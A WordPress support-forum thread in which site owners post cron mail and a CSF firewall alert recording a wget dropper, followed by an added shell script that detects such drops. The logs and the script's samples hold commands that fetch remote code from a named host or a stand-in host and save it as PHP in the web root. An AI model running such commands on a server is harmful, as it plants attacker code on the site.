• Starting from the beginning of the year, my account has been receiving the emails below. To date, I've received over 43,000 of them. Can anybody help me identify the problem and provide some suggestions on how to stop these? Any ideas would be appreciated.
    ——-

    --2014-04-11 18:59:01-- https://www.hestonsflorist.com/PDF/rbkvgqdyle.txt
    Resolving https://www.hestonsflorist.com... 94.242.252.130
    Connecting to https://www.hestonsflorist.com|94.242.252.130|:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 2772 (2.7K) [text/plain]
    Saving to: "/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/odurIzCSJXCX.php"

    0K .. 100% 274M=0s

    2014-04-11 18:59:03 (274 MB/s) - "/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/odurIzCSJXCX.php" saved [2772/2772]

    chmod: cannot access `/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/.htaccess': No such file or directory
    rm: cannot remove `/home/transcr1/public_html/akrontranscription.com/wp-admin/css/colors/light/.htaccess': No such file or directory
    ———–

Viewing 2 replies - 1 through 2 (of 2 total)
  • Same issue here.
    Our CSF firewall advised us that a customer is running a suspicious process.
    Any idea how to solve this?

    ==

    Time: Tue Sep 30 18:40:07 2014 +0200
    PID: 10422 (Parent PID:10421)
    Account: user
    Uptime: 65 seconds

    Executable:

    /usr/bin/wget

    Command Line (often faked in exploits):

    wget https://www.hestonsflorist.com/PDF/rbkvgqdyle.txt -O /home/user/public_html/wp-includes/SimplePie/XML/Declaration/UbgHxHngjSZT.php

    Network connections by the process (if any):

    tcp: x.x.x.x:34622 -> 94.242.252.130:80

    Files open by the process (if any):

    /dev/null
    (deleted)/home/user/public_html/wp-includes/SimplePie/XML/Declaration/UbgHxHngjSZT.php

    Memory maps by the process (if any):

    00400000-00453000 r-xp 00000000 fd:01 16209188 /usr/bin/wget
    00652000-00653000 r--p 00052000 fd:01 16209188 /usr/bin/wget
    00653000-00657000 rw-p 00053000 fd:01 16209188 /usr/bin/wget
    00657000-00662000 rw-p 00000000 00:00 0
    01ccc000-01ced000 rw-p 00000000 00:00 0 [heap]
    7ffcf640c000-7ffcf6411000 r-xp 00000000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6411000-7ffcf6610000 ---p 00005000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6610000-7ffcf6611000 r--p 00004000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6611000-7ffcf6612000 rw-p 00005000 fd:01 13111666 /lib64/libnss_dns-2.12.so
    7ffcf6612000-7ffcf661e000 r-xp 00000000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf661e000-7ffcf681e000 ---p 0000c000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf681e000-7ffcf681f000 r--p 0000c000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf681f000-7ffcf6820000 rw-p 0000d000 fd:01 13115344 /lib64/libnss_files-2.12.so
    7ffcf6820000-7ffcf683d000 r-xp 00000000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf683d000-7ffcf6a3c000 ---p 0001d000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf6a3c000-7ffcf6a3d000 r--p 0001c000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf6a3d000-7ffcf6a3e000 rw-p 0001d000 fd:01 13179517 /lib64/libselinux.so.1
    7ffcf6a3e000-7ffcf6a3f000 rw-p 00000000 00:00 0
    7ffcf6a3f000-7ffcf6a55000 r-xp 00000000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6a55000-7ffcf6c55000 ---p 00016000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6c55000-7ffcf6c56000 r--p 00016000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6c56000-7ffcf6c57000 rw-p 00017000 fd:01 13115354 /lib64/libresolv-2.12.so
    7ffcf6c57000-7ffcf6c59000 rw-p 00000000 00:00 0
    7ffcf6c59000-7ffcf6c5b000 r-xp 00000000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6c5b000-7ffcf6e5a000 ---p 00002000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6e5a000-7ffcf6e5b000 r--p 00001000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6e5b000-7ffcf6e5c000 rw-p 00002000 fd:01 13179696 /lib64/libkeyutils.so.1.3
    7ffcf6e5c000-7ffcf6e66000 r-xp 00000000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf6e66000-7ffcf7065000 ---p 0000a000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf7065000-7ffcf7066000 r--p 00009000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf7066000-7ffcf7067000 rw-p 0000a000 fd:01 13111522 /lib64/libkrb5support.so.0.1
    7ffcf7067000-7ffcf707e000 r-xp 00000000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf707e000-7ffcf727e000 ---p 00017000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf727e000-7ffcf727f000 r--p 00017000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf727f000-7ffcf7280000 rw-p 00018000 fd:01 13111683 /lib64/libpthread-2.12.so
    7ffcf7280000-7ffcf7284000 rw-p 00000000 00:00 0
    7ffcf7284000-7ffcf7299000 r-xp 00000000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf7299000-7ffcf7498000 ---p 00015000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf7498000-7ffcf7499000 r--p 00014000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf7499000-7ffcf749a000 rw-p 00015000 fd:01 13179702 /lib64/libz.so.1.2.3
    7ffcf749a000-7ffcf74c3000 r-xp 00000000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf74c3000-7ffcf76c3000 ---p 00029000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf76c3000-7ffcf76c4000 r--p 00029000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf76c4000-7ffcf76c5000 rw-p 0002a000 fd:01 13111518 /lib64/libk5crypto.so.3.1
    7ffcf76c5000-7ffcf76c6000 rw-p 00000000 00:00 0
    7ffcf76c6000-7ffcf76c9000 r-xp 00000000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf76c9000-7ffcf78c8000 ---p 00003000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf78c8000-7ffcf78c9000 r--p 00002000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf78c9000-7ffcf78ca000 rw-p 00003000 fd:01 13112111 /lib64/libcom_err.so.2.1
    7ffcf78ca000-7ffcf79a5000 r-xp 00000000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf79a5000-7ffcf7ba4000 ---p 000db000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf7ba4000-7ffcf7bae000 r--p 000da000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf7bae000-7ffcf7bb0000 rw-p 000e4000 fd:01 13111520 /lib64/libkrb5.so.3.3
    7ffcf7bb0000-7ffcf7bf1000 r-xp 00000000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7bf1000-7ffcf7df1000 ---p 00041000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7df1000-7ffcf7df2000 r--p 00041000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7df2000-7ffcf7df4000 rw-p 00042000 fd:01 13111474 /lib64/libgssapi_krb5.so.2.2
    7ffcf7df4000-7ffcf7f7e000 r-xp 00000000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf7f7e000-7ffcf817e000 ---p 0018a000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf817e000-7ffcf8182000 r--p 0018a000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf8182000-7ffcf8183000 rw-p 0018e000 fd:01 13111531 /lib64/libc-2.12.so
    7ffcf8183000-7ffcf8188000 rw-p 00000000 00:00 0
    7ffcf8188000-7ffcf818f000 r-xp 00000000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf818f000-7ffcf838e000 ---p 00007000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf838e000-7ffcf838f000 r--p 00006000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf838f000-7ffcf8390000 rw-p 00007000 fd:01 13115356 /lib64/librt-2.12.so
    7ffcf8390000-7ffcf8392000 r-xp 00000000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8392000-7ffcf8592000 ---p 00002000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8592000-7ffcf8593000 r--p 00002000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8593000-7ffcf8594000 rw-p 00003000 fd:01 13115332 /lib64/libdl-2.12.so
    7ffcf8594000-7ffcf8749000 r-xp 00000000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8749000-7ffcf8949000 ---p 001b5000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8949000-7ffcf8964000 r--p 001b5000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8964000-7ffcf8970000 rw-p 001d0000 fd:01 14441880 /usr/lib64/libcrypto.so.1.0.1e
    7ffcf8970000-7ffcf8974000 rw-p 00000000 00:00 0
    7ffcf8974000-7ffcf89d5000 r-xp 00000000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf89d5000-7ffcf8bd5000 ---p 00061000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf8bd5000-7ffcf8bd9000 r--p 00061000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf8bd9000-7ffcf8be0000 rw-p 00065000 fd:01 14493152 /usr/lib64/libssl.so.1.0.1e
    7ffcf8be0000-7ffcf8c00000 r-xp 00000000 fd:01 13115248 /lib64/ld-2.12.so
    7ffcf8de6000-7ffcf8dee000 rw-p 00000000 00:00 0
    7ffcf8dfe000-7ffcf8dff000 rw-p 00000000 00:00 0
    7ffcf8dff000-7ffcf8e00000 r--p 0001f000 fd:01 13115248 /lib64/ld-2.12.so
    7ffcf8e00000-7ffcf8e01000 rw-p 00020000 fd:01 13115248 /lib64/ld-2.12.so
    7ffcf8e01000-7ffcf8e02000 rw-p 00000000 00:00 0
    7fffd189c000-7fffd18b1000 rw-p 00000000 00:00 0 [stack]
    7fffd19fe000-7fffd1a00000 r-xp 00000000 00:00 0 [vdso]
    ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]

    We have found the method to solve this and clean the affected website. We need to find the hacked files, remove them, and clean the crontab. Contact us to clean and fix your website/server: soporte [a] ginernet [dot] com

    The cost of this task is 30€.
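Both posts show the same pattern: a cron job in the hosting account runs wget, fetches a "*.txt" from a third-party host, and writes it as a .php file inside wp-admin/ or wp-includes/, where WordPress never creates PHP at runtime. The script below is an added example, not code from either poster or from CSF; it pulls the payload URL and destination path out of a cron mail and out of a CSF "Command Line" section, flags drops into core directories, and lists PHP files sitting in asset directories of a WordPress root. The hostname payload.example, the /home/acct paths and both sample alerts are constructed for the example.

```shell
#!/bin/sh
# Added triage helper for the cron-driven wget dropper seen in this thread.
# Not part of the original posts or of CSF; the samples below are constructed
# to match the shape of the two alerts, with hostname and paths replaced.

# Constructed sample 1: a cron mail carrying wget's transcript.
SAMPLE_CRON_MAIL='--2014-04-11 18:59:01--  http://payload.example/PDF/rbkvgqdyle.txt
Resolving payload.example... 192.0.2.10
Connecting to payload.example|192.0.2.10|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2772 (2.7K) [text/plain]
Saving to: "/home/acct/public_html/example.com/wp-admin/css/colors/light/odurIzCSJXCX.php"
'

# Constructed sample 2: the "Command Line" section of a CSF/LFD process alert.
SAMPLE_CSF_ALERT='Executable:

/usr/bin/wget

Command Line (often faked in exploits):

wget http://payload.example/PDF/rbkvgqdyle.txt -O /home/acct/public_html/wp-includes/SimplePie/XML/Declaration/UbgHxHngjSZT.php
'

# Read a wget transcript on stdin; print "URL<TAB>DEST" for every saved file.
extract_from_cron_mail() {
  awk '
    # wget opens each transfer with: --YYYY-MM-DD HH:MM:SS--  URL
    /^--[0-9][0-9][0-9][0-9]-[0-9][0-9]-[0-9][0-9] / { url = $NF }
    /^Saving to: / {
      dest = substr($0, index($0, "/"))          # skip prefix and opening quote
      sub("[^A-Za-z0-9/._-]*$", "", dest)        # drop closing quote, curly or plain
      if (url != "") print url "\t" dest
    }'
}

# Read a CSF alert on stdin; print "URL<TAB>DEST" from its wget/curl argv.
# CSF itself notes that argv can be faked, so treat this as a lead and confirm
# it against the alert'"'"'s network-connection and open-files sections.
extract_from_csf_alert() {
  awk '
    /^Command Line/ { grab = 1; next }
    grab && /^(wget|curl) / {
      url = ""; dest = ""
      for (i = 2; i <= NF; i++) {
        if ($i == "-O" || $i == "-o") { dest = $(i + 1); i++ }
        else if ($i ~ "^https?://") { url = $i }
      }
      if (url != "" && dest != "") print url "\t" dest
      grab = 0
    }'
}

# Exit 0 when DEST is a PHP file under wp-admin/ or wp-includes/. Only the
# core updater touches those trees, and it does not fetch .txt from third-party
# hosts, so a cron job writing PHP there is a dropper.
is_suspicious_php_drop() {
  case "$1" in
    *.php|*.php[0-9]|*.phtml) ;;
    *) return 1 ;;
  esac
  case "$1" in
    */wp-admin/*|*/wp-includes/*) return 0 ;;
    *) return 1 ;;
  esac
}

# Run both extractors over the samples; one line per finding: VERDICT URL DEST.
triage() {
  {
    printf '%s' "$SAMPLE_CRON_MAIL" | extract_from_cron_mail
    printf '%s' "$SAMPLE_CSF_ALERT" | extract_from_csf_alert
  } | while IFS="$(printf '\t')" read -r url dest; do
    if is_suspicious_php_drop "$dest"; then v=SUSPICIOUS; else v=ok; fi
    printf '%s\t%s\t%s\n' "$v" "$url" "$dest"
  done
}

# On the affected host: list PHP files inside the asset directories of a
# WordPress root ($1). A clean install keeps only CSS/JS/images there, so
# every hit is a candidate dropped file to inspect and remove.
find_php_in_asset_dirs() {
  find "$1" -type f \( -name '*.php' -o -name '*.phtml' \) \
    \( -path '*/wp-admin/css/*' -o -path '*/wp-admin/js/*' -o -path '*/wp-admin/images/*' \
       -o -path '*/wp-includes/css/*' -o -path '*/wp-includes/js/*' -o -path '*/wp-includes/images/*' \) \
    2>/dev/null
}

triage
```

The asset-directory walk catches the first post's drop but not the second one, which lands among SimplePie's legitimate PHP; for that, compare the install against upstream with WP-CLI's `wp core verify-checksums`, and remove the scheduled job itself with `crontab -l -u <account>` / `crontab -r -u <account>` (or by editing the account's crontab), otherwise the file comes back on the next run.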

  • The topic ‘Cron Daemon Emails’ is closed to new replies.